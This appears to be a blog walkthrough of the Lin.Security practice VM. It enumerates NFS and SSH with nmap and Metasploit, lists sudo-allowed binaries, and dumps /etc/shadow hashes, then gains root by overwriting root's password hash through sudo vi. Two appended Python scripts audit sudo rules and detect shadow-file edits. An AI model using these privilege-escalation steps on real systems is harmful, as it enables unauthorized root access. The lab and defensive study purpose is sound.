Lin.Security 1

I'm going to try to finish my initial VM list from way back when I started this blog within the next week and move on to learning some Windows shit. It's 2021 and still, most corporate networks are using Windows.

Recon

  • VM published 11 Jul, 2018
  • Author is a Pentesting company, website still up and appears to be active
  • They give us initial credentials on their website: bob/secret
  • Image is Ubuntu 18.04 LTS

I'm assuming if they give us initial credentials, this one actually isn't going to be a web attack!

Enumeration

└─$ sudo nmap -nP 10.10.10.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 11:46 EST
Nmap scan report for 10.10.10.1
Host is up (0.000079s latency).
All 1000 scanned ports on 10.10.10.1 are filtered
MAC Address: 08:00:27:64:8F:E2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.6
Host is up (0.000064s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
2049/tcp open  nfs
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.4
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.25 seconds

Alright well, it looks like we have a little more than just an ssh login - nfs is always fun! I suppose I'll make sure to try every path I see and at least start a scanner against this:

msf6 > search nfs
Matching Modules
================
   #  Name                                   Disclosure Date  Rank     Check  Description
   -  ----                                   ---------------  ----     -----  -----------
   0  auxiliary/dos/freebsd/nfsd/nfsd_mount                   normal   No     FreeBSD Remote NFS RPC Request Denial of Service
   1  auxiliary/scanner/nfs/nfsmount                          normal   No     NFS Mount Scanner
   2  exploit/netware/sunrpc/pkernel_callit  2009-09-30       good     No     NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
   3  exploit/osx/local/nfs_mount_root       2014-04-11       normal   Yes    Mac OS X NFS Mount Privilege Escalation Exploit
   4  exploit/windows/ftp/labf_nfsaxe        2017-05-15       normal   No     LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
   5  exploit/windows/ftp/xlink_client       2009-10-03       normal   No     Xlink FTP Client Buffer Overflow
   6  exploit/windows/ftp/xlink_server       2009-10-03       good     Yes    Xlink FTP Server Buffer Overflow
   7  exploit/windows/nfs/xlink_nfsd         2006-11-06       average  No     Omni-NFS Server Buffer Overflow
Interact with a module by name or index. For example info 7, use 7 or use exploit/windows/nfs/xlink_nfsd
msf6 > use 1
msf6 auxiliary(scanner/nfs/nfsmount) > info
       Name: NFS Mount Scanner
     Module: auxiliary/scanner/nfs/nfsmount
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PROTOCOL  udp              yes       The protocol to use (Accepted: udp, tcp)
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     111              yes       The target port (TCP)
  THREADS   1                yes       The number of concurrent threads (max one per host)
Description:
  This module scans NFS mounts and their permissions.
References:
  https://cvedetails.com/cve/CVE-1999-0170/
  http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 10.10.10.6
RHOSTS => 10.10.10.6
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 10.10.10.6:111        - 10.10.10.6 NFS Export: /home/peter [*]
[*] 10.10.10.6:111        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Let's now log in to the machine with our given credential and poke around a bit:

$ ssh bob@10.10.10.6

Cool banner!

bob@linsecurity:~$ ls -al
total 28
drwxr-xr-x 4 bob  bob  4096 Jul 10  2018 .
drwxr-xr-x 5 root root 4096 Jul  9  2018 ..
-rw-r--r-- 1 bob  bob   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 bob  bob  3771 Apr  4  2018 .bashrc
drwx------ 2 bob  bob  4096 Jul  9  2018 .cache
-rw-rw-r-- 1 bob  bob     0 Jul  9  2018 .cloud-locale-test.skip
drwx------ 3 bob  bob  4096 Jul  9  2018 .gnupg
-rw-r--r-- 1 bob  bob   807 Apr  4  2018 .profile

Nothing interesting in home directory.

bob@linsecurity:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
        /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim,
        /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

Oh sweet jesus that's a lot of gtfobins we can run as root... Do any of them have SUID set?

$ find . -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename
...
bob@linsecurity:/$ cat /tmp/filename 
-rwsr-xr-x 1 root root 40152 Nov 30  2017 ./snap/core/4917/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 ./snap/core/4917/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 ./snap/core/4917/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17  2017 ./snap/core/4917/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30  2017 ./snap/core/4917/bin/umount
-rwsr-xr-x 1 root root 71824 May 17  2017 ./snap/core/4917/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17  2017 ./snap/core/4917/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17  2017 ./snap/core/4917/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17  2017 ./snap/core/4917/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17  2017 ./snap/core/4917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul  4  2017 ./snap/core/4917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 ./snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18  2018 ./snap/core/4917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 98440 Jun 21  2018 ./snap/core/4917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29  2016 ./snap/core/4917/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Nov 30  2017 ./snap/core/4486/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 ./snap/core/4486/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 ./snap/core/4486/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17  2017 ./snap/core/4486/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30  2017 ./snap/core/4486/bin/umount
-rwsr-xr-x 1 root root 71824 May 17  2017 ./snap/core/4486/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17  2017 ./snap/core/4486/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17  2017 ./snap/core/4486/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17  2017 ./snap/core/4486/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17  2017 ./snap/core/4486/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul  4  2017 ./snap/core/4486/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 ./snap/core/4486/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18  2018 ./snap/core/4486/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 94344 Apr 16  2018 ./snap/core/4486/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29  2016 ./snap/core/4486/usr/sbin/pppd
-rwsr-xr-x 1 root root 64424 Mar  9  2017 ./bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11  2016 ./bin/fusermount
-rwsr-xr-x 1 root root 26696 May 16  2018 ./bin/umount
-rwsr-xr-x 1 root root 146128 Nov 30  2017 ./bin/ntfs-3g
-rwsr-xr-x 1 root root 44664 Jan 25  2018 ./bin/su
-rwsr-xr-x 1 root root 43088 May 16  2018 ./bin/mount
-rwsr-xr-x 1 root root 22520 Mar 27  2018 ./usr/bin/pkexec
-rwsr-xr-x 1 root root 18640 Oct 27  2016 ./usr/bin/netkit-rlogin
-rwsr-x--- 1 root itservices 18552 Apr 10  2018 ./usr/bin/xxd
-rwsr-xr-x 1 root root 37136 Jan 25  2018 ./usr/bin/newgidmap
-rwsr-xr-x 1 root root 40344 Jan 25  2018 ./usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 18  2018 ./usr/bin/sudo
-rwsr-xr-x 1 root root 22728 Oct 27  2016 ./usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 76496 Jan 25  2018 ./usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25  2018 ./usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25  2018 ./usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Mar  9  2017 ./usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37136 Jan 25  2018 ./usr/bin/newuidmap
-rwsr-xr-x 1 root root 14504 Oct 27  2016 ./usr/bin/netkit-rsh
-rwsr-sr-x 1 root root 30800 May 16  2018 ./usr/bin/taskset
-rwsr-xr-x 1 root root 59640 Jan 25  2018 ./usr/bin/passwd
-rwsr-xr-x 1 root root 10232 Mar 28  2017 ./usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Nov 15  2017 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 80056 Jun  5  2018 ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 436552 Feb 10  2018 ./usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Mar 27  2018 ./usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 101208 May 16  2018 ./usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 113336 Jan 16  2018 ./sbin/mount.nfs

We can run an editor as root though... so this means we have full read access to the entire system, let's use that to dig a bit deeper shall we?

$ sudo vi /etc/shadow
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
pkexecbob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::

Recap

  • SSH on port 22
  • nfs on port 2049
  • rpcbind on 111
  • There's an NFS mount at /home/peter
  • We can run quite a few commands as root (including an editor), this should be very useful for us
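
The sudo finding in this recap can be checked for mechanically when auditing a host. The following is an added example, not part of the original post: it parses the `sudo -l` rule lines shown above and flags every allowed program that amounts to root-equivalent access. The `RISK` classification and the function names are my own assumptions, not a complete list.

```python
import os
import re

# Rule section of the `sudo -l` output shown earlier on this page.
SUDO_L = """\
User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
        /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim,
        /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
"""

# Assumed classification (illustrative, incomplete): programs that give the
# caller a root shell or arbitrary root file access when allowed through sudo.
RISK = {
    "shell": {"ash", "bash", "sh", "csh", "dash", "zsh"},
    "interpreter": {"awk", "perl", "tclsh", "expect", "env"},
    "editor-or-pager": {"ed", "less", "man", "more", "vi", "pico", "rvim"},
    "file-transfer": {"curl", "ftp", "scp", "ssh", "socat"},
    "runs-subcommands": {"find", "git", "script"},
}

def parse_sudo_l(text):
    """Return (runas, command) pairs from the rule section of `sudo -l`."""
    rules = text.split("may run the following commands", 1)[-1]
    rules = " ".join(l.strip() for l in rules.splitlines()[1:])  # join wrapped lines
    pairs = []
    # Each rule starts with a "(runas)" spec; arguments containing parentheses
    # are not handled by this simple pattern.
    for runas, cmds in re.findall(r"\(([^)]*)\)\s*([^()]+)", rules):
        for cmd in re.split(r"(?<!\\),\s*", cmds):  # "\," is an escaped comma
            cmd = re.sub(r"^(?:[A-Z_]+:\s*)+", "", cmd.strip())  # drop NOPASSWD: etc.
            if cmd:
                pairs.append((runas, cmd))
    return pairs

def audit(text):
    """Return sorted unique (path, runas, risk_class, args) for risky rules."""
    found = set()
    for runas, cmd in parse_sudo_l(text):
        path, _, args = cmd.partition(" ")
        name = os.path.basename(path)
        cls = "unrestricted" if path == "ALL" else next(
            (c for c, names in RISK.items() if name in names), None)
        if cls:
            found.add((path, runas, cls, args))
    return sorted(found)

if __name__ == "__main__":
    for path, runas, cls, args in audit(SUDO_L):
        print(f"{path:<18} runas={runas:<4} {cls}" + (f" (args: {args})" if args else ""))
```

A rule that pins a single command with fixed arguments, such as a service restart, passes this check, while every entry in bob's rule is flagged.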

Exploitation

I should be able to just edit /etc/shadow to set my own password for root...

# Create a sha-512 hashed password:
$ mkpasswd -m sha-512 -S saltsalt -s
Password: password
$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/
bob@linsecurity:/$ sudo vi /etc/shadow
... changed root hash line to:
root:$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/:17721:0:99999:7:::
# Login with password password
bob@linsecurity:/$ su
Password: 
root@linsecurity:/# id
uid=0(root) gid=0(root) groups=0(root)

We win! There's probably a ton of ways to win this one, but I don't really care, I just want quick roots to finish off these Linux boxes. EASY!
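
The hand edit of /etc/shadow leaves a trace a defender can look for: the hash and salt change, but the last-change field (17721) stays as it was, which a change made through passwd would have updated. The following is an added example, not part of the original post. It compares the two root lines shown above, and the snapshot date passed to it (the nmap timestamp on this page) and all function names are my own assumptions.

```python
from datetime import date, timedelta

# root's /etc/shadow line before and after the edit, as shown on this page.
BEFORE = "root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::"
AFTER = "root:$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/:17721:0:99999:7:::"

def parse_shadow(text):
    """Map user -> crypt scheme id, salt, full hash and last-change date."""
    entries = {}
    for line in text.splitlines():
        f = line.strip().split(":")
        if len(f) != 9:
            continue  # not a shadow(5) record
        crypt = f[1].split("$")  # "$6$salt$digest" -> ["", "6", "salt", "digest"]
        has_hash = len(crypt) >= 4 and crypt[0] == ""
        entries[f[0]] = {
            "hash": f[1],
            "scheme": crypt[1] if has_hash else None,
            "salt": crypt[-2] if has_hash else None,
            # field 3 counts days since 1970-01-01
            "lastchg": date(1970, 1, 1) + timedelta(days=int(f[2])) if f[2] else None,
        }
    return entries

def diff_shadow(before, after, snapshot_day):
    """Report hash changes; mark those whose last-change date was not updated."""
    old, new = parse_shadow(before), parse_shadow(after)
    findings = []
    for user, cur in new.items():
        prev = old.get(user)
        if prev is None or prev["hash"] == cur["hash"]:
            continue
        # passwd stamps field 3 with the day of the change; a hand edit leaves it.
        stale = cur["lastchg"] == prev["lastchg"] and cur["lastchg"] != snapshot_day
        findings.append((user, prev["salt"], cur["salt"], cur["lastchg"], stale))
    return findings

if __name__ == "__main__":
    for user, old_salt, new_salt, changed, stale in diff_shadow(BEFORE, AFTER, date(2021, 2, 28)):
        note = "last-change date not updated" if stale else "last-change date updated"
        print(f"{user}: salt {old_salt} -> {new_salt}, lastchg {changed}, {note}")
```

Feeding it periodic copies of /etc/shadow taken by a file-integrity job gives the before and after inputs.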